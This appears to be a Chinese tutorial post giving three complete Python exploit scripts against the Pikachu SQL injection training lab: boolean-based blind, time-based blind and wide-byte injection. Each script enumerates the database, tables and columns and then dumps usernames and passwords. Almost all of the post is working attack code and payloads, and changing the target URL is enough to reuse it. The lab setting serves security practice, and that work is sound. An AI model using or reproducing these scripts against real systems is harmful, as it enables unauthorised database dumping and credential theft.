Pikachu的python一键exp,盲注(base on boolean),盲注(base on time),宽字节注入
1.盲注(base on boolean)
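import requests
import time

# Blind injection (boolean-based)
# ===================== Configuration =====================
url = "http://127.0.0.1/pikachu-master/vul/sqli/sqli_blind_b.php"
base_params = {
    "name": "",
    "submit": "查询",
}
TRUE_TEXT = "your uid"  # text the page shows when the condition holds
FALSE_TEXT = "username不存在"  # text the page shows when it does not
# ====================================================================


def bool_check(payload):
    """Send *payload* in the ``name`` parameter and read the boolean oracle.

    Args:
        payload: value placed in the ``name`` query parameter.

    Returns:
        True when the response contains TRUE_TEXT and not FALSE_TEXT,
        False otherwise. A failed request (timeout, connection error) is
        also reported as False, so it is indistinguishable from a
        genuine "false" answer; callers get a shorter result rather
        than an exception.
    """
    params = base_params.copy()
    params["name"] = payload
    try:
        res = requests.get(url, params=params, timeout=3)
    except requests.RequestException:
        return False
    return TRUE_TEXT in res.text and FALSE_TEXT not in res.text


def get_length(sql):
    """Find the length of the result of *sql* by testing 1..49.

    Returns:
        The matching length, or 0 when no length in range matched.
    """
    for length in range(1, 50):
        payload = f"kobe' and length(({sql}))={length}#"
        if bool_check(payload):
            return length
    return 0


def get_content(sql):
    """Recover the result of *sql* one character at a time.

    Printable ASCII (32..126) is tried for each position. A position for
    which no candidate matches (for example after a failed request) is
    skipped silently, so the returned string may be shorter than
    get_length() reported.

    Returns:
        The recovered string, possibly empty.
    """
    length = get_length(sql)
    result = ""
    for i in range(1, length + 1):
        for ascii_code in range(32, 127):
            payload = f"kobe' and ascii(substr(({sql}),{i},1))={ascii_code}#"
            if bool_check(payload):
                result += chr(ascii_code)
                print(f"\r[+] 已获取:{result}", end="")
                break
    return result


def main():
    """Run the four extraction steps and print each result."""
    print("=" * 60)
    print("🔥 PIKACHU 布尔盲注 ")
    print("=" * 60)

    print("\n[1] 数据库名:", end="")
    db_name = get_content("select database()")
    print(f" => {db_name}")

    print("\n[2] 所有表名:", end="")
    tables = get_content("select group_concat(table_name) from information_schema.tables where table_schema=database()")
    print(f" => {tables}")

    print("\n[3] member 字段:", end="")
    cols = get_content("select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='member'")
    print(f" => {cols}")

    print("\n[4] 账号密码:", end="")
    data = get_content("select group_concat(username,':',pw) from member")
    print(f" => {data}")

    print("\n✅ 脱库完成!")


# Guarded so importing the module does not fire the requests.
if __name__ == "__main__":
    main()

2.盲注(base on time)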
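import requests
import time

# ===================== Must point at the time-based blind page =====================
url = "http://127.0.0.1/pikachu-master/vul/sqli/sqli_blind_t.php"
base_params = {
    "name": "",
    "submit": "查询",
}
SLEEP = 2  # seconds the injected sleep() is asked for; also the decision threshold
# =================================================================


def time_check(payload):
    """Send *payload* and report whether the round trip took >= SLEEP seconds.

    Args:
        payload: value placed in the ``name`` query parameter.

    Returns:
        True when the request lasted at least SLEEP seconds. Errors are
        not raised: a read timeout (5 s, longer than SLEEP) therefore
        reads as True, while a fast connection failure reads as False.
    """
    params = base_params.copy()
    params["name"] = payload
    # monotonic clock: wall-clock adjustments would corrupt the measurement
    start = time.monotonic()
    try:
        requests.get(url, params=params, timeout=5)
    except requests.RequestException:
        pass
    return time.monotonic() - start >= SLEEP


def get_length(sql):
    """Find the length of the result of *sql* by testing 1..49.

    Returns:
        The matching length, or 0 when no length in range matched.
    """
    for length in range(1, 50):
        payload = f"kobe' and if(length(({sql}))={length}, sleep({SLEEP}), 1)#"
        if time_check(payload):
            return length
    return 0


def get_content(sql):
    """Recover the result of *sql* one character at a time.

    Printable ASCII (32..126) is tried per position; a position with no
    match is skipped silently, so the result may be shorter than
    get_length() reported.

    Returns:
        The recovered string, possibly empty.
    """
    length = get_length(sql)
    result = ""
    for i in range(1, length + 1):
        for asc in range(32, 127):
            payload = f"kobe' and if(ascii(substr(({sql}),{i},1))={asc}, sleep({SLEEP}), 1)#"
            if time_check(payload):
                result += chr(asc)
                print(f"\r[+] 已获取:{result}", end="")
                break
    return result


def main():
    """Run the four extraction steps and print each result."""
    print("=" * 60)
    print("🔥 PIKACHU 时间盲注 ")
    print("=" * 60)

    print("\n数据库名:", end="")
    db = get_content("select database()")
    print(f" => {db}")

    print("\n表名:", end="")
    tables = get_content("select group_concat(table_name) from information_schema.tables where table_schema=database()")
    print(f" => {tables}")

    print("\n字段:", end="")
    cols = get_content("select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='member'")
    print(f" => {cols}")

    print("\n账号密码:", end="")
    data = get_content("select group_concat(username,':',pw) from member")
    print(f" => {data}")

    print("\n✅ 脱库完成!")


# Guarded so importing the module does not fire the requests.
if __name__ == "__main__":
    main()

3.宽字节注入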
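import requests

target = "http://127.0.0.1/pikachu-master/vul/sqli/sqli_widebyte.php"
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
}


def exp(payload):
    """POST a pre-encoded form body and parse the uid/email the page echoes.

    Args:
        payload: the complete, already URL-encoded form body.

    Returns:
        ``(uid, email)`` as stripped strings, or ``(None, None)`` when the
        request fails or the response lacks either marker. The original
        only checked the uid marker and raised IndexError when the email
        marker was missing; both are checked now.
    """
    post_data = payload.encode()
    try:
        # timeout added so a hung server cannot block the script forever
        res = requests.post(target, data=post_data, headers=headers, timeout=5).text
    except requests.RequestException:
        return None, None
    if "your uid:" not in res or "your email is:" not in res:
        return None, None
    uid = res.split("your uid:")[1].split("<br />")[0].strip()
    email = res.split("your email is:")[1].split("</p>")[0].strip()
    return uid, email


if __name__ == "__main__":
    print("======== Pikachu 宽字节注入 全套EXP ========\n")

    # 1. database name + server version
    u1, e1 = exp("name=1%df' union select database(),version() #&submit=%E6%9F%A5%E8%AF%A2")
    print(f"[1] 当前数据库:{u1}")
    print(f"[2] MySQL版本:{e1}\n")

    # 2. all table names in the current schema
    u2, e2 = exp("name=1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #&submit=%E6%9F%A5%E8%AF%A2")
    print(f"[3] 全部数据表:{e2}\n")

    # 3. column names of the users table (the table name is a plain quoted
    #    literal here; the earlier comment about backticks did not match the payload)
    u3, e3 = exp("name=1%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' #&submit=%E6%9F%A5%E8%AF%A2")
    print(f"[4] users表字段:{e3}\n")

    # 4. first username/password row
    u4, e4 = exp("name=1%df' union select username,password from users limit 0,1 #&submit=%E6%9F%A5%E8%AF%A2")
    print(f"[5] 账号:{u4}")
    print(f"[6] 密码:{e4}")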